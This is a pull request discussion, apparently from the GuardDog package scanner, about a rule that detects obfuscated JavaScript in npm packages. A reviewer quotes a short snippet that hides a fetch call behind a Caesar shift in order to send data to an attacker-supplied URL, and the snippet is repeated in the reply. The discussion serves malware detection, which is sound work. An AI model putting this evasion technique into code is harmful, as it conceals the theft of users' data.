Add NPM detection of obfuscated javascript code

sobregosodd opened the pull request:
Adds new rule that detects javascript code being purposefully obfuscated.
The goal is to detect the most common patterns used by obfuscates such as:
- Function and parameter renaming 
- String array mapping
- Overcomplicated control flow

christophetd commented on guarddog/analyzer/sourcecode/npm-obfuscation.yml:
```diff
@@ -0,0 +1,38 @@
+rules:
```
This rule looks great, any clue about the expected FP rate? Sounds like it would be great to scan the top 1k packages manually, and then maybe a small random sample?

sobregosodd replied:
Yes, I scan a random sample of 100 top packages manually.
But I can, download 1k of the top packages and then scan last week.
I will let you know the outcome

christophetd replied:
very nice!

sobregosodd replied:
Scanned the 1k packages. 0 FP 🙌 
While scanning this week I found actual malware, so 👍

cedricvanrompay-datadog commented:
Cool!

Should we add detection for `self[fetch]` and similar techniques as described in https://david-gilbertson.medium.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5

```javascript
const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
self[k(i)](urlWithYourPreciousData);
```

Note also that the article mentions the use of `new EventSource` as a replacement for `fetch`.

Or this could wait for another PR, I can even try to write it myself.

sobregosodd commented:
> Cool!
> 
> Should we add detection for `self[fetch]` and similar techniques as described in https://david-gilbertson.medium.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5
> 
> ```js
> const i = 'gfudi';
> const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
> self[k(i)](urlWithYourPreciousData);
> ```
> 
> Note also that the article mentions the use of `new EventSource` as a replacement for `fetch`.
> 
> Or this could wait for another PR, I can even try to write it myself.

done. Added Cesars cipher that will catch this.
